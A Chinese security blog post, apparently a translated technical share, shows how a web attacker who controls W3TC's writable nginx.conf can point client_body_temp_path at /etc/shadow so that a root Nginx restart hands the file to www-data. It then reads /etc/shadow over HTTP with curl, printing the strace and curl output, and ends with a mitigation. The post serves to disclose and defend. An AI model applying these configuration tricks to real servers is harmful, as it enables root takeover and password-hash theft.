【技术分享】通过W3TC与Nginx获取服务器root权限

作者：360U2671379114

稿费：50RMB

投稿方式：发送邮件至linwei#360.cn，或登陆网页版在线投稿

在人见人爱的WordPress缓存插件W3TC与Nignx结合时，有些教程告诉你要在Nginx的配置文件中加入像这样的东西：

location / {  
    include /var/www/wordpress/nginx.conf;
}

当我写这篇博客的时候，这条建议现在已经成为了关于“W3TC Nginx”搜索条目的第二大热门

如果你还不知道这个配置文件是可以被W3TC（以及加上扩展的PHP）重写的，这条建议的作用就是让W3TC能够重载Nginx的配置

现在我们假设攻击者已经攻破了你的WordPress站点，并且拥有了读写www-data的权限——这在Debian和其他一些Linux发行版上是PHP5-FPM默认的

攻击者就能够灵活的去运用一些Nginx配置选项，并且把W3TC的配置改成这样：

client_body_temp_path /etc/shadow;
# optional but more fun :)
location /wat {  
        alias /etc;
}

这告诉Nginx目前你使用/etc/shadow路径来存储缓存文件。显然，这并非一个文件夹，但让我们看看下次重启Nginx时会发生什么

# strace -e trace=chmod,chown -f nginx
chown("/etc/shadow", 33, 4294967295)    = 0  
+++ exited with 0 +++

显然，任何文件或文件夹一旦被攻击者写入到上述的配置文件，它的所有者都会被更改为www-data。要注意，这个现象是发生在Root用户的主进程中的，因此这对所有文件都是一样的

我们可以以这种方法通过PHP来读取到/etc/shadow或者主机的任意文件，而对于读取上述的shadow文件，我们还可以使用curl

$ curl -s http://localhost/wat/shadow | head
root:$6$IPIbhbCwb7gHQC<SNIP>:0:99999:7:::  
daemon:*:17074:0:99999:7:::  
bin:*:17074:0:99999:7:::  
sys:*:17074:0:99999:7:::  
sync:*:17074:0:99999:7:::  
games:*:17074:0:99999:7:::  
man:*:17074:0:99999:7:::  
lp:*:17074:0:99999:7:::  
mail:*:17074:0:99999:7:::  
news:*:17074:0:99999:7:::  
$ curl -s http://localhost/wat/shadow | head
root:$6$IPIbhbCwb7gHQC<SNIP>:0:99999:7:::  
daemon:*:17074:0:99999:7:::  
bin:*:17074:0:99999:7:::  
sys:*:17074:0:99999:7:::  
sync:*:17074:0:99999:7:::  
games:*:17074:0:99999:7:::  
man:*:17074:0:99999:7:::  
lp:*:17074:0:99999:7:::  
mail:*:17074:0:99999:7:::  
news:*:17074:0:99999:7:::

于是现在系统上所有的文件夹或文件所有权都能被更改为www-data了，并且攻击者获得了读写权限。而通过非暴力破解shadow文件手段来获取Root权限的shell的方式，则留给读者去练习和思考。

关于降低危害的方法

永远不要让PHP来替你管理Web服务器配置！